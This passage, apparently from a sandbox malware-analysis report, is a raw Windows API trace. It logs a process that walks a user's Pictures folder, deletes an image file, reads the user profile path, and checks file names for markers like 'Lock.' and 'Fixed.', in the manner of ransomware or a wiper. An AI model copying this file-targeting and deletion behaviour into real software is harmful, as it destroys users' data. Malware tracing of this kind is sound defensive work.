ftLastAccessTime.dwHighDateTime=0x1d5cb16, ftLastWriteTime.dwLowDateTime=0x165d7400, ftLastWriteTime.dwHighDateTime=0x1d5cb16, nFileSizeHigh=0x0, nFileSizeLow=0x7be6, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="6MclNK.gif", cAlternateFileName="")) returned 0x9e21f8 [0208.868] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\6MclNK.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\6mclnk.gif")) returned 1 [0208.870] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4110030, ftCreationTime.dwHighDateTime=0x1d5d29b, ftLastAccessTime.dwLowDateTime=0x165d7400, ftLastAccessTime.dwHighDateTime=0x1d5cb16, ftLastWriteTime.dwLowDateTime=0x165d7400, ftLastWriteTime.dwHighDateTime=0x1d5cb16, nFileSizeHigh=0x0, nFileSizeLow=0x7be6, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="6MclNK.gif", cAlternateFileName="")) returned 0 [0208.870] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0208.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0208.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0208.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.871] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0208.871] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa750 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0208.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa690 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0208.871] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0208.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0208.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0208.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0208.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0208.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0208.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0208.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0208.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0208.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0208.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0208.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0208.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0208.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x48) returned 0x2a5d660 [0208.873] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/6MclNK.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\6MclNK.gif", lpFilePart=0x8cf650*="6MclNK.gif") returned 0x23 [0208.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d660 | out: hHeap=0x2af0000) returned 1 [0208.873] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\6MclNK.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\6mclnk.gif")) returned 0xffffffff [0208.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0208.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.873] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0208.873] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.873] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0208.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0208.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0208.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0208.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0208.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0208.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0208.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8xG9dA2_eGqi0pv0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xG9dA2_eGqi0pv0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G9dA2_eGqi0pv0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9dA2_eGqi0pv0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dA2_eGqi0pv0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A2_eGqi0pv0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2_eGqi0pv0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_eGqi0pv0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eGqi0pv0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gqi0pv0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qi0pv0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i0pv0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0pv0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pv0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0208.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0208.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0208.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0208.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0208.875] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0208.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0208.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0208.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2e) returned 0x2aa6450 [0208.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8xG9dA2_eGqi0pv0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xG9dA2_eGqi0pv0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G9dA2_eGqi0pv0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9dA2_eGqi0pv0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dA2_eGqi0pv0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A2_eGqi0pv0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2_eGqi0pv0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_eGqi0pv0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eGqi0pv0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gqi0pv0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qi0pv0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i0pv0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0pv0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pv0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b0.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0208.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6300 [0208.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0208.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6300 | out: hHeap=0x2af0000) returned 1 [0208.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0208.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0208.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0208.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0208.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0208.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0208.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0208.877] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0208.877] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0208.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0208.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b48 [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0208.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0208.877] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0208.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0208.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0208.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.878] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0208.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0208.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0208.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0208.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 